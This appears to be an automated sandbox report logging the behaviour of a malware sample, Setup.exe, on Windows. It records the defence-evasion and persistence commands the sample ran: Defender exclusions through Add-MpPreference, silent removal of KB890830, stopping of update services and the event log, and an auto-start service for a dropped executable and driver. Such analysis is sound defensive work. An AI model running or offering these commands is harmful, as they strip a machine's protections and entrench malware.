          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:544:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6776:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6736:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1768:120:WilError_03
          Source: C:\Windows\System32\dialer.exe Mutant created: \BaseNamedObjects\Global\llfrvfnuexbwtixr
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3508:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6520:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5288:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xhp5dxa.c1z.ps1
          Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exe WMI Queries: Provider::ExecQuery - CIMWin32 : select * from Win32_Process where name = "csrss.exe"
          Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exe WMI Queries: Provider::ExecQuery - CIMWin32 : select * from Win32_Process where name = "csrss.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _Revision, _WorkId, Application, "Index", Category, Activation, HostId, Executable, Entrypoint, RuntimeType, StartPage, ResourceGroup, Flags, Subsystem, Parameters, _LouserzedDictionary, _Dictionary FROM ApplicationExtension WHERE _ApplicationExtensionID=? AND _WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT _PackageLocationID, _Revision, _WorkId, Package, Volume, InstalledLocation, MutableLink, MutableLocation, _Dictionary FROM PackageLocation WHERE Package=? AND _WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT fta._FileTypeAssociationID, fta._Revision, fta._WorkId, fta.FileType, fta.ContentType, fta.Extension, fta."Index", fta.ProgID, fta._Dictionary FROM FileTypeAssociation AS fta INNER JOIN ApplicationExtension AS ae ON ae._ApplicationExtensionID=fta.Extension INNER JOIN Application AS a ON a._ApplicationID=ae.Application INNER JOIN PackageUser AS pu ON pu.Package=a.Package INNER JOIN User AS u ON u._UserID=pu.User WHERE fta.FileType=?2 AND u.UserSid=?1 AND fta._WorkId=0 AND ae._WorkId=0 AND a._WorkId=0 AND pu._WorkId=0 ;
          Source: svchost.exe, 0000006B.00000000.1587532438.00000184E1C50000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SELECT name FROM SQLITE_MASTER WHERE type='table' AND name NOT LIKE 'sqlite_%';
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SELECT p._PackageID, p._Revision, p._WorkId, p.PackageFamily, p.ResourceId, p.Architecture, p.Version, p.PackageFullName, p.IsInbox, p.PackageType, p.Flags, p.Flags2, p.DisplayName, p.PublisherDisplayName, p.Description, p.Logo, p.OSMinVersion, p.OSMaxVersionTested, p.TargetDeviceFamily, p.Capabilities, p.SupportedUsers, p.SignatureOrigin, p.PackageOrigin, p.Enterprise, p.SourceBundle, p.EditionId, p.OSVersionWhenIndexed, p.InPlaceUpdateBaseline, p._Dictionary FROM Package AS p INNER JOIN PackageUser AS pu ON pu.Package=p._PackageID WHERE p.PackageFullName=?2 AND pu.User=?1 AND p._WorkId=0 AND pu._WorkId=0;
          Source: svchost.exe, 0000006B.00000000.1591366075.00000184E257C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SELECT _UserID FROM User WHERE UserSid=?;
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | File read: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe
          Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "SXJAJUSN"
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto"
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "SXJAJUSN"
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe | Key opened: HKEY_USERS\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
          Source: MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip | Static file information: File size 4442123 > 1048576
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorSYSTE source: svchost.exe, 00000057.00000002.2504659405.0000029D50218000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1495352991.0000029D50213000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58318b source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: _prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2* source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctA360.tmp.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb001\* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jnxsifnrdetl.exe, 00000035.00000003.1466293932.0000026FC3DC0000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2AC2 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024F000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000057.00000002.2581903644.0000029D50263000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000000.1496050809.0000029D5025A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831-B09 source: svchost.exe, 00000057.00000000.1495847365.0000029D50240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2554443428.0000029D5024B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000057.00000000.1495639134.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000057.00000002.2529023695.0000029D5022B000.00000004.00000001.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs
          Source: C:\Windows\System32\dialer.exe | Code function: 81_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, | 81_2_00000001408460F0
          Source: jnxsifnrdetl.exe.17.dr | Static PE information: section name: .00cfg
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Code function: 3_2_000000343D8FF418 push eax; iretd | 3_2_000000343D8FF63A
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Code function: 17_2_000000EE88D8F238 push eax; iretd | 17_2_000000EE88D8F26A
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Code function: 53_2_000000C7CB98F133 push eax; iretd | 53_2_000000C7CB98F14A
          Source: C:\Windows\System32\dialer.exe | Code function: 80_2_0000000140001394 push qword ptr [0000000140009004h]; ret | 80_2_0000000140001403
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_000002809239C6DD push rcx; retf 003Fh | 131_2_000002809239C6DE

          Persistence and Installation Behavior

          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | File created: C:\Windows\TEMP\sidneyeifgjd.sys
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | File created: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | File created: C:\Windows\Temp\sidneyeifgjd.sys
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
